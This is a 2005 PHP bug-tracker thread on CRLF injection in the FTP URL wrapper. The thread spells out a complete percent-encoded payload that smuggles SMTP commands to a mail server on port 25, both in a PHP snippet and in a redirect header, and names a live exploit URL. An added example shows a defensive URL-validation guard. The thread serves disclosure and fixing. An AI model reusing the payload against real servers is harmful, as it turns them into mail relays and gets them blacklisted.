ID:               32936
User updated by:  herbert dot groot dot jebbink at gmail dot com
Reported By:      herbert dot groot dot jebbink at gmail dot com
Status:           Closed
Bug Type:         FTP related
Operating System: Linux
PHP Version:      5.0.4
Assigned To:      pollita
New Comment:

Thanks for the patch; however, IMHO the patch should not be applied in the HTTP wrapper to check a redirect but in the FTP wrapper. That way it will also work in the below situation, where PHP is still tricked into sending a mail.

$ftp = 'ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:[EMAIL PROTECTED]:25/';
$check = file_get_contents($ftp);


Previous Comments:
------------------------------------------------------------------------

[2005-05-06 04:24:29] [EMAIL PROTECTED]

This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change will be in the next snapshot. You can grab the snapshot at http://snaps.php.net/.

Thank you for the report, and for helping us make PHP better.

------------------------------------------------------------------------

[2005-05-05 12:18:16] herbert dot groot dot jebbink at gmail dot com

"Interesting" was not the word that I used when I found out that my server was blacklisted as a spam machine and my emails were rejected by many mailservers.

My bot that is written in PHP was trapped in the given exploit.

------------------------------------------------------------------------

[2005-05-05 04:42:41] [EMAIL PROTECTED]

Interesting...

------------------------------------------------------------------------

[2005-05-04 00:33:27] herbert dot groot dot jebbink at gmail dot com

Description:
------------
See http://dsbl.org/relay-methods#FTPURL for more details.

An exploit can be found at http://dividedsky.net/gfx/badges

This URL gives the next result.

HTTP/1.x 302 Found
Date: Tue, 03 May 2005 21:43:41 GMT
Server: Apache/2.0.53 (Debian GNU/Linux) PHP/4.3.10-10
Content-Location: badges.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/4.3.10-10
Location: ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AVv%2FcqZoUAlAyMb9O2R+Xu0YSwQNRN5DL%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:[EMAIL PROTECTED]:25/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1

Reproduce code:
---------------
<?php

// DO NOT RUN THIS CODE
// YOUR SERVER WILL BE LISTED ON DSBL.ORG
// RESULTING IN POSSIBLE REJECTS OF YOUR EMAILS

$check = getimagesize('http://dividedsky.net/gfx/badges');

?>

------------------------------------------------------------------------

-- 
Edit this bug report at http://bugs.php.net/?id=32936&edit=1
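
Added example, not part of the bug report thread and not PHP's own fix: a userland guard that rejects both cases discussed above, a direct ftp:// URL and a redirect Location header carrying percent-encoded CR/LF. The function names and sample headers are constructed for illustration; it assumes the caller fetches with the HTTP context option follow_location set to 0 and inspects each redirect hop itself.

```php
<?php
// Added example: function names and sample data are hypothetical/constructed.

/** True if the URL holds control bytes, raw or after one round of percent-decoding. */
function url_has_control_bytes(string $url): bool
{
    // %0D%0A becomes a real CR LF once decoded, which is what lets a
    // "username" carry extra protocol lines to the server on the other end.
    return preg_match('/[\x00-\x1f\x7f]/', rawurldecode($url)) === 1;
}

/** Accept only http(s) URLs that are free of encoded or raw control bytes. */
function is_safe_fetch_url(string $url): bool
{
    if (url_has_control_bytes($url)) {
        return false;
    }
    $scheme = parse_url($url, PHP_URL_SCHEME);
    return is_string($scheme)
        && in_array(strtolower($scheme), ['http', 'https'], true);
}

/** Extract the Location value from a header list such as $http_response_header. */
function redirect_target(array $headers): ?string
{
    foreach ($headers as $line) {
        if (stripos($line, 'Location:') === 0) {
            return trim(substr($line, strlen('Location:')));
        }
    }
    return null;
}

// Constructed samples: a benign redirect, a cross-scheme redirect with an
// encoded CRLF in the userinfo part, and a plain cross-scheme redirect.
$samples = [
    ['HTTP/1.1 302 Found', 'Location: https://img.example.invalid/badge.png'],
    ['HTTP/1.1 302 Found', 'Location: ftp://foo%0D%0ANOOP:x@mail.example.invalid:25/'],
    ['HTTP/1.1 302 Found', 'Location: ftp://files.example.invalid/badge.png'],
];

foreach ($samples as $headers) {
    $target  = redirect_target($headers);
    $verdict = ($target !== null && is_safe_fetch_url($target)) ? 'follow' : 'refuse';
    printf("%-7s %s\n", $verdict, $target ?? '(no Location header)');
}
```

The same is_safe_fetch_url() check applies to any URL taken from user input before it is passed to file_get_contents() or getimagesize(), which covers the direct ftp:// case raised in the newest comment.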
